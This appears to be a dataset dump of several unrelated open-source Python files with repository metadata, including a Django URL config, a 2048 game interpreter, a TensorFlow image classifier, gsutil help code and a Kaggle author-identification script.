# admin.autodiscover()
urlpatterns = patterns('',
(r'^$', 'blog.views.index'),
url(
r'^blog/views/(?P<slug>[^\.]+).html',
'blog.views.view_post',
name='view_blog_post'),
url(
r'^blog/category/(?P<slug>[^\.]+).html',
'blog.views.view_category',
name='view_blog_category'),
## (r'^search-form/$', views.search_form),
## (r'^search/$', views.search),
##
# Examples:
# url(r'^$', 'mysite.views.home', name='home'),
# url(r'^mysite/', include('mysite.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
# url(r'^admin/', include(admin.site.urls)),
)
| [
"mm200716024@gmail.com"
] | mm200716024@gmail.com |
d6a3abae49cb2cd634fa86b7f02cb8cb1d23251b | c4b4d340558d31b5bcf91695fffec19718f4ff2b | /05二叉树/001二叉树深度.py | 7ef4ea5b4f51bc7cd96cd91f59bca53fffadbdee | [] | no_license | sjtupig/algorithm | 4b334aa7f9319e644979fac0b9f506b4861b99ed | 7ecf1336348fa3dfc4a4d579b50493b268e5ec26 | refs/heads/master | 2020-04-30T05:31:25.343633 | 2019-03-22T02:38:37 | 2019-03-22T02:38:37 | 176,628,625 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | class TreeNode(object):
"""docstring for TreeNode"""
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def TreeDepth(self, pRoot):
# write code here
if not pRoot:return 0
return max(self.TreeDepth(pRoot.left),self.TreeDepth(pRoot.right))+1 | [
"noreply@github.com"
] | sjtupig.noreply@github.com |
db275d091a8f3f15fa4d61d6e285bc93fe0b803a | 17e7928e6b6d335e121b2b863d5c878b2e9b9e6e | /classify_image.py | 9df435ab3af26eca749d282759c7a274c09b6ac2 | [] | no_license | alexpadraic/auto-trash | 0b1748666222ab8974f4d760ca31823f36cb6343 | 53a23d5fcf2daffd2c362c9a245d8b72da869a59 | refs/heads/development | 2021-01-12T17:48:05.674854 | 2020-09-09T16:20:46 | 2020-09-09T16:20:46 | 69,391,095 | 9 | 1 | null | 2016-09-27T19:53:00 | 2016-09-27T19:26:51 | Python | UTF-8 | Python | false | false | 7,995 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple image classification with Inception.
Run image classification with Inception trained on ImageNet 2012 Challenge data
set.
This program creates a graph from a saved GraphDef protocol buffer,
and runs inference on an input JPEG image. It outputs human readable
strings of the top 5 predictions along with their probabilities.
Change the --image_file argument to any jpg image to compute a
classification of that image.
Please see the tutorial and website for a detailed description of how
to use this script to perform image recognition.
https://tensorflow.org/tutorials/image_recognition/
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import re
import sys
import tarfile
import operator
import numpy as np
from six.moves import urllib
import tensorflow as tf
FLAGS = tf.app.flags.FLAGS
# classify_image_graph_def.pb:
# Binary representation of the GraphDef protocol buffer.
# imagenet_synset_to_human_label_map.txt:
# Map from synset ID to a human readable string.
# imagenet_2012_challenge_label_map_proto.pbtxt:
# Text representation of a protocol buffer mapping a label to synset ID.
tf.app.flags.DEFINE_string(
'model_dir', '/home/pi/cerberus/imagenet',
"""Path to classify_image_graph_def.pb, """
"""imagenet_synset_to_human_label_map.txt, and """
"""imagenet_2012_challenge_label_map_proto.pbtxt.""")
tf.app.flags.DEFINE_string('image_file', '',
"""Absolute path to image file.""")
tf.app.flags.DEFINE_integer('num_top_predictions', 5,
"""Display this many predictions.""")
# pylint: disable=line-too-long
DATA_URL = 'http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz'
# pylint: enable=line-too-long
class NodeLookup():
"""Converts integer node ID's to human readable labels."""
def __init__(self,
label_lookup_path=None,
uid_lookup_path=None):
if not label_lookup_path:
label_lookup_path = os.path.join(
FLAGS.model_dir, 'imagenet_2012_challenge_label_map_proto.pbtxt')
if not uid_lookup_path:
uid_lookup_path = os.path.join(
FLAGS.model_dir, 'imagenet_synset_to_human_label_map.txt')
self.node_lookup = self.load(label_lookup_path, uid_lookup_path)
def load(self, label_lookup_path, uid_lookup_path):
"""Loads a human readable English name for each softmax node.
Args:
label_lookup_path: string UID to integer node ID.
uid_lookup_path: string UID to human-readable string.
Returns:
dict from integer node ID to human-readable string.
"""
if not tf.gfile.Exists(uid_lookup_path):
tf.logging.fatal('File does not exist %s', uid_lookup_path)
if not tf.gfile.Exists(label_lookup_path):
tf.logging.fatal('File does not exist %s', label_lookup_path)
# Loads mapping from string UID to human-readable string
proto_as_ascii_lines = tf.gfile.GFile(uid_lookup_path).readlines()
uid_to_human = {}
p = re.compile(r'[n\d]*[ \S,]*')
for line in proto_as_ascii_lines:
parsed_items = p.findall(line)
uid = parsed_items[0]
human_string = parsed_items[2]
uid_to_human[uid] = human_string
# Loads mapping from string UID to integer node ID.
node_id_to_uid = {}
proto_as_ascii = tf.gfile.GFile(label_lookup_path).readlines()
for line in proto_as_ascii:
if line.startswith(' target_class:'):
target_class = int(line.split(': ')[1])
if line.startswith(' target_class_string:'):
target_class_string = line.split(': ')[1]
node_id_to_uid[target_class] = target_class_string[1:-2]
# Loads the final mapping of integer node ID to human-readable string
node_id_to_name = {}
for key, val in node_id_to_uid.items():
if val not in uid_to_human:
tf.logging.fatal('Failed to locate: %s', val)
name = uid_to_human[val]
node_id_to_name[key] = name
return node_id_to_name
def id_to_string(self, node_id):
if node_id not in self.node_lookup:
return ''
return self.node_lookup[node_id]
def create_graph():
"""Creates a graph from saved GraphDef file and returns a saver."""
# Creates graph from saved graph_def.pb.
with tf.gfile.FastGFile(os.path.join(
FLAGS.model_dir, 'classify_image_graph_def.pb'), 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(graph_def, name='')
def run_inference_on_image(image):
"""Runs inference on an image.
Args:
image: Image file name.
Returns:
Nothing
"""
if not tf.gfile.Exists(image):
tf.logging.fatal('File does not exist %s', image)
image_data = tf.gfile.FastGFile(image, 'rb').read()
# Creates graph from saved GraphDef.
create_graph()
with tf.Session() as sess:
# Some useful tensors:
# 'softmax:0': A tensor containing the normalized prediction across
# 1000 labels.
# 'pool_3:0': A tensor containing the next-to-last layer containing 2048
# float description of the image.
# 'DecodeJpeg/contents:0': A tensor containing a string providing JPEG
# encoding of the image.
# Runs the softmax tensor by feeding the image_data as input to the graph.
softmax_tensor = sess.graph.get_tensor_by_name('softmax:0')
predictions = sess.run(softmax_tensor,
{'DecodeJpeg/contents:0': image_data})
predictions = np.squeeze(predictions)
# Creates node ID --> English string lookup.
node_lookup = NodeLookup()
predictions_and_scores = {}
top_k = predictions.argsort()[-FLAGS.num_top_predictions:][::-1]
for node_id in top_k:
human_string = node_lookup.id_to_string(node_id)
score = predictions[node_id]
# print(top_k)
# print('%s (score = %.5f)' % (human_string, score))
predictions_and_scores[human_string] = score
sorted_predictions_and_scores = sorted(predictions_and_scores.items(), key=operator.itemgetter(1))
# print(sorted_predictions_and_scores)
return sorted_predictions_and_scores
# Don't need necessarily need this method so long as we include the inception model with the program
# package
def maybe_download_and_extract():
"""Download and extract model tar file."""
dest_directory = FLAGS.model_dir
if not os.path.exists(dest_directory):
os.makedirs(dest_directory)
filename = DATA_URL.split('/')[-1]
filepath = os.path.join(dest_directory, filename)
if not os.path.exists(filepath):
def _progress(count, block_size, total_size):
sys.stdout.write('\r>> Downloading %s %.1f%%' % (
filename, float(count * block_size) / float(total_size) * 100.0))
sys.stdout.flush()
filepath, _ = urllib.request.urlretrieve(DATA_URL, filepath, _progress)
print()
statinfo = os.stat(filepath)
print('Succesfully downloaded', filename, statinfo.st_size, 'bytes.')
tarfile.open(filepath, 'r:gz').extractall(dest_directory)
# ********** main function
# def main(_):
# maybe_download_and_extract()
# image = (FLAGS.image_file if FLAGS.image_file else
# os.path.join(FLAGS.model_dir, 'cropped_panda.jpg'))
# run_inference_on_image(image)
# if __name__ == '__main__':
# tf.app.run()
| [
"raj7desai@gmail.com"
] | raj7desai@gmail.com |
8f0012d44f36e196f592191ec42d324b90aefd4c | 164711270ae7320796890f90aeca688c27380f96 | /website/setup.py | 1871c41a68c6cf0a6990f97991c570a81f92d8dc | [] | no_license | runephilosof/aichallenge | 2a5e90ae89af1ca9c47dc9efd940524c10ec5f20 | ccd1e50b5a52eb90a81fddc29a2b4478e0c07ab0 | refs/heads/epsilon | 2023-04-05T01:37:58.913002 | 2021-04-06T09:38:58 | 2021-04-06T09:38:58 | 349,961,829 | 0 | 0 | null | 2021-03-21T10:29:58 | 2021-03-21T10:15:14 | null | UTF-8 | Python | false | false | 1,258 | py | #!/usr/bin/env python
import glob
import re
import os
def replaceMarkdown():
competition="Ants"
seewikiregex=re.compile(r'(<!--<MarkdownReplacement with="([^\n>]*.md)">-->.*?<!--</MarkdownReplacement>-->)',re.DOTALL)
markdownlocation = "aichallenge.wiki/"
for page in glob.iglob("*.php"):
try:
pagecontent=open(page,"r").read()
matches=(match.groups() for match in seewikiregex.finditer(pagecontent))
for toreplace, markdownfilename in matches:
realmarkdownfilename=markdownfilename.replace("competition",competition)
print "Inserting `%s` into `%s`, where `%s...` was." % (realmarkdownfilename,page,toreplace[:90])
compiledmarkdown=os.popen("python md.py %s" % markdownlocation+realmarkdownfilename).read()
compiledmarkdown='<!--<MarkdownReplacement with="%s">-->%s<!--</MarkdownReplacement>-->' % (markdownfilename,compiledmarkdown)
pagecontent=pagecontent.replace(toreplace,compiledmarkdown)
open(page,"w").write(pagecontent)
except IOError:
print "Ignoring `%s` because of errors" % (page)
def setup():
replaceMarkdown()
if __name__=="__main__":
setup() | [
"alex@hypertriangle.com"
] | alex@hypertriangle.com |
58ab631f8cfd89a1a2391594b2cd854b8a1cea02 | 1c80736a61d76d0e17f2a08dbf2d7730b71b278f | /game.py | aaccb40b8fb3520971e632312281b43d29a84a09 | [
"MIT"
] | permissive | someshsingh22/2048-Language | fc9a0c50bcafa67683b1410ac588960cac29a6db | ca8f5280d748876adb614c39f628b2d4db7d247d | refs/heads/main | 2023-08-17T13:55:01.391712 | 2021-09-25T18:35:08 | 2021-09-25T18:35:08 | 356,891,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,753 | py | import random
import re
from copy import deepcopy
import sys
from itertools import product
from errors import (
WrongIndex,
IdentifierExists,
EmptyTileNamingException,
EmptyTileQueryException,
)
class Tile:
"""
The tiles used for the 2048 Board, contains the list of assignments mapped and value of the tile
parameters:
value: the value present in the tile currently
variables: list of variables mapped currently
index: refers to the location of tile in the matrix
"""
def __init__(self, index):
super().__init__()
self.value = 0
self.index = index
self.variables = list()
def re_index(self, index):
"""
Update index of tile after move
"""
self.index = index
def __repr__(self):
return "%4d " % self.value if self.value > 0 else " " * 5
class Board:
"""
The 2048 Game Engine, takes commands from the translator and executes
Parameters:
size: 2-tuple of number of rows and columns
variables:
rows, columns: The limit for number of rows/columns
matrix: 2D Array for keeping track of tiles
fmap: function maps that maps strings that refers to the member functions of the class
"""
def __init__(self, size=(4, 4)):
self.rows, self.columns = size
self.matrix = self.empty_matrix()
self.add_random_tile()
self.add_random_tile()
self.fmap = {
"NAME": self.name,
"ASSIGN": self.assign,
"QUERY": self.query,
"MOVE": self.move,
}
print("\033[32m2048 >>> Welcome to the 2048 Gaming Language \033[0m")
self.choice()
print("\033[32m2048 >>> Below is the Board. Happy Coding! \033[0m")
print(self)
def choice(self):
print(
"\033[34mOn subtracting left what should the output be in this case \033[0m"
)
option_row = [Tile((0, 0)) for i in range(4)]
option_row[0].value = 4
option_row[1].value = 2
option_row[2].value = 2
option_row[3].value = 4
print(re.sub(r"[\,\[\]]", "|", option_row.__repr__()))
option_row[0].value = 4
option_row[1].value = 4
option_row[2].value = 0
option_row[3].value = 0
print("\nA:\n" + re.sub(r"[\,\[\]]", "|", option_row.__repr__()))
option_row[0].value = 4
option_row[1].value = 0
option_row[2].value = 0
option_row[3].value = 4
print("\nB:\n" + re.sub(r"[\,\[\]]", "|", option_row.__repr__()))
self.flag = -1
while self.flag < 0:
print("\033[32m2048 >>> \033[0m", end="")
inp = input()
if inp == "A":
print("\033[34mA rule will be followed throughout \033[0m")
self.flag = 1
elif inp == "B":
print("\033[34mB rule will be followed throughout \033[0m")
self.flag = 0
else:
print(
"\033[34mYou selected neither option, please select A or B \033[0m"
)
self.flag = -1
def empty_matrix(self):
"""
Creates an empty board
"""
return [
[Tile(index=(r, c)) for c in range(self.columns)] for r in range(self.rows)
]
def update_indexes(self):
"""
Update All indexes after moving
"""
for row, col in product(range(self.rows), range(self.columns)):
self.matrix[row][col].re_index((row, col))
def __repr__(self):
"""
Printer Function
"""
return (
"\033[33m"
+ re.sub(
r"[\,\[\]]", "|", "\n".join([row.__repr__() for row in self.matrix])
)
+ "\033[0m"
)
def compress(self):
"""
Compress Utility Function
"""
new_mat = self.empty_matrix()
for i in range(self.rows):
pos = 0
for j in range(self.columns):
if self.matrix[i][j].value != 0:
new_mat[i][pos] = deepcopy(self.matrix[i][j])
pos += 1
self.matrix.clear()
self.matrix = deepcopy(new_mat)
def merge(self, operation):
"""
Merge operation for tiles
"""
for i in range(self.rows):
for j in range(self.columns - 1):
if (
self.matrix[i][j].value == self.matrix[i][j + 1].value
and self.matrix[i][j].value != 0
):
if operation == "SUBTRACT":
self.matrix[i][j].value = 0
self.matrix[i][j].variables.clear()
else:
if operation == "ADD":
self.matrix[i][j].value *= 2
elif operation == "MULTIPLY":
self.matrix[i][j].value *= self.matrix[i][j].value
elif operation == "DIVIDE":
self.matrix[i][j].value = 1
self.matrix[i][j].variables.extend(
self.matrix[i][j + 1].variables
)
self.matrix[i][j + 1].value = 0
self.matrix[i][j + 1].variables.clear()
def reverse_matrix(self):
"""
Returns the reverse of matrix
"""
for row in range(self.rows):
self.matrix[row].reverse()
def transpose(self):
"""
Returns the transpose of matrix
"""
for row in range(self.rows):
for col in range(row):
self.matrix[row][col], self.matrix[col][row] = (
self.matrix[col][row],
self.matrix[row][col],
)
def move(self, direction, operation, verbose=True):
"""
Move Operation, Moves in the given direction and applies the given operation
"""
if direction == "UP":
self.transpose()
self.move("LEFT", operation, verbose=False)
self.transpose()
elif direction == "DOWN":
self.transpose()
self.move("RIGHT", operation, verbose=False)
self.transpose()
elif direction == "LEFT":
self.compress()
self.merge(operation)
if self.flag == 1:
self.compress()
elif direction == "RIGHT":
self.reverse_matrix()
self.move("LEFT", operation, verbose=False)
self.reverse_matrix()
else:
print("INVALID DIRECTION")
if not self.is_game_over() and verbose:
self.add_random_tile()
print(self)
self.update_indexes()
def assign(self, value, index):
"""
Assign Operation, Takes index and value and assigns value to that index
"""
x, y = index
x, y = x - 1, y - 1
if not self.is_valid(x, y):
raise WrongIndex(index, (1, 1), (self.rows, self.columns))
self.matrix[x][y].value = value
if value == 0:
self.matrix[x][y].variables.clear()
print(self)
def query(self, index):
"""
Returns the value on given index
"""
x, y = index
x, y = x - 1, y - 1
if not self.is_valid(x, y):
raise WrongIndex(index, (1, 1), (self.rows, self.columns))
elif self.empty_index(x, y):
raise EmptyTileQueryException(index)
value = self.matrix[x][y].value
print(value)
return value
def name(self, varName, index):
"""
Assigns some value to given varnames in memory
"""
x, y = index
x, y = x - 1, y - 1
if self.varExists(varName):
raise IdentifierExists(varName)
elif not self.is_valid(x, y):
raise WrongIndex(index, (1, 1), (self.rows, self.columns))
elif self.empty_index(x, y):
raise EmptyTileNamingException(index)
else:
self.matrix[x][y].variables.append(varName)
def add_random_tile(self, p=0.5):
"""
Adds a random tile to the board, being 2 or 4 with probability p, 1-p
"""
row, col = random.choice(
[
index
for index in product(range(self.rows), range(self.columns))
if self.matrix[index[0]][index[1]].value == 0
],
)
self.matrix[row][col].value = 2 if random.random() <= p else 4
def is_game_over(self):
"""
Checks if the game is over
"""
dx = [0, 1, 0, -1]
dy = [1, 0, -1, 0]
for i, j in product(range(self.rows), range(self.columns)):
if self.matrix[i][j].value == 0:
return False
for k in range(4):
x = i + dx[k]
y = j + dy[k]
if (
self.is_valid(x, y)
and self.matrix[x][y].value == self.matrix[i][j].value
):
return False
return True
def empty_index(self, x, y):
"""
Checks if the tile is empty for given row, col
"""
return self.matrix[x][y].value == 0
def is_valid(self, x, y):
"""
checks if the index is out of bounds
"""
return x >= 0 and y >= 0 and x < self.rows and y < self.columns
def get_identifiers(self):
"""
Gets string of space separated index / variables
"""
var_out = ""
for row, col in product(range(self.rows), range(self.columns)):
tile = self.matrix[row][col]
index = "%d,%d" % (row + 1, col + 1)
var = ",".join(tile.variables)
if var:
var_out += index + var + "\40"
return var_out
def varExists(self, varName):
"""
Checks if a variable already exists
"""
for row in range(self.rows):
for col in range(self.columns):
if varName in self.matrix[row][col].variables:
return (row + 1, col + 1)
return None
def get_row_major(self):
"""
Gets row major output
"""
row_maj = []
for row in self.matrix:
row_maj.extend([str(tile.value) for tile in row])
return "\40".join(row_maj)
def eout(self):
"""
Sends the message to stderr
"""
print("%s %s" % (self.get_row_major(), self.get_identifiers()), file=sys.stderr)
| [
"someshsingh9414@gmail.com"
] | someshsingh9414@gmail.com |
7f2bc13f3b49ac4bb99cd8a03c9d886de3c9552c | a59d55ecf9054d0750168d3ca9cc62a0f2b28b95 | /.install/.backup/platform/gsutil/gslib/help_provider.py | adf4c90d50cad5e50dfe990e242fb236c5bc9fdd | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | bopopescu/google-cloud-sdk | bb2746ff020c87271398196f21a646d9d8689348 | b34e6a18f1e89673508166acce816111c3421e4b | refs/heads/master | 2022-11-26T07:33:32.877033 | 2014-06-29T20:43:23 | 2014-06-29T20:43:23 | 282,306,367 | 0 | 0 | NOASSERTION | 2020-07-24T20:04:47 | 2020-07-24T20:04:46 | null | UTF-8 | Python | false | false | 3,604 | py | # Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from gslib.exception import CommandException
class HelpType(object):
COMMAND_HELP = 'command_help'
ADDITIONAL_HELP = 'additional_help'
ALL_HELP_TYPES = [HelpType.COMMAND_HELP, HelpType.ADDITIONAL_HELP]
# help_spec key constants.
HELP_NAME = 'help_name'
HELP_NAME_ALIASES = 'help_name_aliases'
HELP_TYPE = 'help_type'
HELP_ONE_LINE_SUMMARY = 'help_one_line_summary'
HELP_TEXT = 'help_text'
SUBCOMMAND_HELP_TEXT = 'subcommand_help_text'
# Constants enforced by SanityCheck
MAX_HELP_NAME_LEN = 15
MIN_ONE_LINE_SUMMARY_LEN = 10
MAX_ONE_LINE_SUMMARY_LEN = 80 - MAX_HELP_NAME_LEN
REQUIRED_SPEC_KEYS = [HELP_NAME, HELP_NAME_ALIASES, HELP_TYPE,
HELP_ONE_LINE_SUMMARY, HELP_TEXT]
DESCRIPTION_PREFIX = """
<B>DESCRIPTION</B>"""
SYNOPSIS_PREFIX = """
<B>SYNOPSIS</B>"""
class HelpProvider(object):
"""Interface for providing help."""
# Each subclass must define the following map.
help_spec = {
# Name of command or auxiliary help info for which this help applies.
HELP_NAME : None,
# List of help name aliases.
HELP_NAME_ALIASES : None,
# HelpType.
HELP_TYPE : None,
# One line summary of this help.
HELP_ONE_LINE_SUMMARY : None,
# The full help text.
HELP_TEXT : None,
}
# This is a static helper instead of a class method because the help loader
# (gslib.commands.help._LoadHelpMaps()) operates on classes not instances.
def SanityCheck(help_provider, help_name_map):
"""Helper for checking that a HelpProvider has minimally adequate content."""
for k in REQUIRED_SPEC_KEYS:
if k not in help_provider.help_spec or help_provider.help_spec[k] is None:
raise CommandException('"%s" help implementation is missing %s '
'specification' % (help_provider.help_name, k))
# Sanity check the content.
assert (len(help_provider.help_spec[HELP_NAME]) > 1
and len(help_provider.help_spec[HELP_NAME]) < MAX_HELP_NAME_LEN)
for hna in help_provider.help_spec[HELP_NAME_ALIASES]:
assert len(hna) > 0
one_line_summary_len = len(help_provider.help_spec[HELP_ONE_LINE_SUMMARY])
assert (one_line_summary_len > MIN_ONE_LINE_SUMMARY_LEN
and one_line_summary_len < MAX_ONE_LINE_SUMMARY_LEN)
assert len(help_provider.help_spec[HELP_TEXT]) > 10
# Ensure there are no dupe help names or aliases across commands.
name_check_list = [help_provider.help_spec[HELP_NAME]]
name_check_list.extend(help_provider.help_spec[HELP_NAME_ALIASES])
for name_or_alias in name_check_list:
if help_name_map.has_key(name_or_alias):
raise CommandException(
'Duplicate help name/alias "%s" found while loading help from %s. '
'That name/alias was already taken by %s' % (name_or_alias,
help_provider.__module__, help_name_map[name_or_alias].__module__))
def CreateHelpText(synopsis, description):
"""Helper for adding help text headers given synopsis and description."""
return SYNOPSIS_PREFIX + synopsis + DESCRIPTION_PREFIX + description
| [
"alfred.wechselberger@technologyhatchery.com"
] | alfred.wechselberger@technologyhatchery.com |
c614a7b17eb2294bdf098e4b3faa84a86a3ed2d9 | 5143b06ce91c1640bd9622c7245d01b1ddc050c8 | /generators/classes.py | be0d37403cce3550fcfaf934aea58cce1b4cc561 | [] | no_license | jpraychev/code-snippets | 55447f40516f834ad8ae75bc9bce7bfd036b7395 | 87694ec4763e75304fb3b3738029f7a113833c0f | refs/heads/master | 2023-04-16T09:43:19.144942 | 2021-04-27T06:25:13 | 2021-04-27T06:25:13 | 340,878,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,095 | py |
import sys
import random
import itertools
class RandomNumbers(object):
def __init__(self, arr):
self.arr = arr
def __iter__(self):
for num in self.arr:
yield num
# arr = []
# for _ in range(10):
# arr.append(random.randint(1,100))
arr = [random.randint(1,100) for _ in range(10)]
print(arr)
def gen_func1(arr):
for x in arr:
yield x
# def gen_func(num):
# for n in num:
# yield n
def gen_func(n):
m = 0
while m < n:
yield random.randint(1,100)
m += 1
iter_obj = gen_func(10)
# a,b = itertools.tee(iter_obj, 2)
# print(a)
# print(b)
# print(list(a))
# print(list(b))
def get_average(gen):
total = sum(gen)
print(f'Random numbers -> {list(gen)}')
print(f'Total -> {total}')
for num in gen:
yield round(100 * num / total,2)
test1 = gen_func1(arr)
# print(test1)s
test2 = get_average(test1)
# print(test2.__next__())
obj = RandomNumbers(arr)
# obj = gen_func1(arr)
a = iter(obj)
b = iter(obj)
print(a)
print(b)
print(f'Average -> {list(get_average(obj))}') | [
"jpraychev@gmail.com"
] | jpraychev@gmail.com |
48e2d7509c3ff795db0dc5f1698c5858c5e81c7b | ccbfc7818c0b75929a1dfae41dc061d5e0b78519 | /aliyun-openapi-python-sdk-master/aliyun-python-sdk-cs/aliyunsdkcs/request/v20151215/DescribeAgilityTunnelAgentInfoRequest.py | 37758b4a66546675df1e6431acbd485dd825bb85 | [
"Apache-2.0"
] | permissive | P79N6A/dysms_python | 44b634ffb2856b81d5f79f65889bfd5232a9b546 | f44877b35817e103eed469a637813efffa1be3e4 | refs/heads/master | 2020-04-28T15:25:00.368913 | 2019-03-13T07:52:34 | 2019-03-13T07:52:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,210 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RoaRequest
class DescribeAgilityTunnelAgentInfoRequest(RoaRequest):
def __init__(self):
RoaRequest.__init__(self, 'CS', '2015-12-15', 'DescribeAgilityTunnelAgentInfo')
self.set_uri_pattern('/agility/[Token]/agent_info')
self.set_method('GET')
def get_Token(self):
return self.get_path_params().get('Token')
def set_Token(self,Token):
self.add_path_param('Token',Token) | [
"1478458905@qq.com"
] | 1478458905@qq.com |
ce2ff9a43105c7f3fdb86d05f4e307ccfedf72bd | eff821d00430ca165effe3ec1c3f4d3ee5f84702 | /spooky_author_identification/spooky_author_identification.py | 60a138a8b5681722dc5084f0258ede9f0d6af986 | [] | no_license | zzb5233/kaggle_project | b1e3aae9f82006fe3f45e603ed6a169343dda114 | 7273f65d55a27cc22b1364721c733c8b2a6f3b84 | refs/heads/master | 2020-04-07T08:51:18.969996 | 2018-12-27T13:07:17 | 2018-12-27T13:07:17 | 158,230,438 | 1 | 0 | null | null | null | null | WINDOWS-1252 | Python | false | false | 23,760 | py | import pandas as pd
import numpy as np
import xgboost as xgb
from tqdm import tqdm
from sklearn.svm import SVC
from keras.models import Sequential
from keras.layers.recurrent import LSTM, GRU
from keras.layers.core import Dense, Activation, Dropout
from keras.layers.embeddings import Embedding
from keras.layers.normalization import BatchNormalization
from keras.utils import np_utils
from sklearn import preprocessing, decomposition, model_selection, metrics, pipeline
from sklearn.model_selection import GridSearchCV
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.decomposition import TruncatedSVD
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import MultinomialNB
from keras.layers import GlobalMaxPooling1D, Conv1D, MaxPooling1D, Flatten, Bidirectional, SpatialDropout1D
from keras.preprocessing import sequence, text
from keras.callbacks import EarlyStopping
from nltk import word_tokenize
from nltk.corpus import stopwords
stop_words = stopwords.words('english')
#´ò¿ªÎļþ
train = pd.read_csv('./train.csv')
test = pd.read_csv('./test.csv')
sample = pd.read_csv('./sample_submission.csv')
def multiclass_logloss(actual, predicted, eps=1e-15):
"""Multi class version of Logarithmic Loss metric.
:param actual: Array containing the actual target classes
:param predicted: Matrix with class predictions, one probability per class
"""
# Convert 'actual' to a binary array if it's not already:
if len(actual.shape) == 1:
actual2 = np.zeros((actual.shape[0], predicted.shape[1]))
for i, val in enumerate(actual):
actual2[i, val] = 1
actual = actual2
clip = np.clip(predicted, eps, 1 - eps)
rows = actual.shape[0]
vsota = np.sum(actual * np.log(clip))
return -1.0 / rows * vsota
lbl_enc = preprocessing.LabelEncoder()
y = lbl_enc.fit_transform(train.author.values)
xtrain, xvalid, ytrain, yvalid = train_test_split(train.text.values, y, stratify=y, random_state=42, test_size=0.1, shuffle=True)
print (xtrain.shape)
print (xvalid.shape)
# Always start with these features. They work (almost) everytime!
tfv = TfidfVectorizer(min_df=3, max_features=None,
strip_accents='unicode', analyzer='word',token_pattern=r'\w{1,}',
ngram_range=(1, 3), use_idf=1,smooth_idf=1,sublinear_tf=1,
stop_words = 'english')
# Fitting TF-IDF to both training and test sets (semi-supervised learning)
tfv.fit(list(xtrain) + list(xvalid))
xtrain_tfv = tfv.transform(xtrain)
xvalid_tfv = tfv.transform(xvalid)
# Fitting a simple Logistic Regression on TFIDF
clf = LogisticRegression(C=1.0)
clf.fit(xtrain_tfv, ytrain)
predictions = clf.predict_proba(xvalid_tfv)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
ctv = CountVectorizer(analyzer='word',token_pattern=r'\w{1,}',
ngram_range=(1, 3), stop_words = 'english')
# Fitting Count Vectorizer to both training and test sets (semi-supervised learning)
ctv.fit(list(xtrain) + list(xvalid))
xtrain_ctv = ctv.transform(xtrain)
xvalid_ctv = ctv.transform(xvalid)
# Fitting a simple Logistic Regression on Counts
clf = LogisticRegression(C=1.0)
clf.fit(xtrain_ctv, ytrain)
predictions = clf.predict_proba(xvalid_ctv)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
clf = MultinomialNB()
clf.fit(xtrain_tfv, ytrain)
predictions = clf.predict_proba(xvalid_tfv)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# Fitting a simple Naive Bayes on Counts
clf = MultinomialNB()
clf.fit(xtrain_ctv, ytrain)
predictions = clf.predict_proba(xvalid_ctv)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# Apply SVD, I chose 120 components. 120-200 components are good enough for SVM model.
svd = decomposition.TruncatedSVD(n_components=120)
svd.fit(xtrain_tfv)
xtrain_svd = svd.transform(xtrain_tfv)
xvalid_svd = svd.transform(xvalid_tfv)
# Scale the data obtained from SVD. Renaming variable to reuse without scaling.
scl = preprocessing.StandardScaler()
scl.fit(xtrain_svd)
xtrain_svd_scl = scl.transform(xtrain_svd)
xvalid_svd_scl = scl.transform(xvalid_svd)
# Fitting a simple SVM
clf = SVC(C=1.0, probability=True) # since we need probabilities
clf.fit(xtrain_svd_scl, ytrain)
predictions = clf.predict_proba(xvalid_svd_scl)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# Fitting a simple xgboost on tf-idf
clf = xgb.XGBClassifier(max_depth=7, n_estimators=200, colsample_bytree=0.8,
subsample=0.8, nthread=10, learning_rate=0.1)
clf.fit(xtrain_tfv.tocsc(), ytrain)
predictions = clf.predict_proba(xvalid_tfv.tocsc())
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# Fitting a simple xgboost on tf-idf
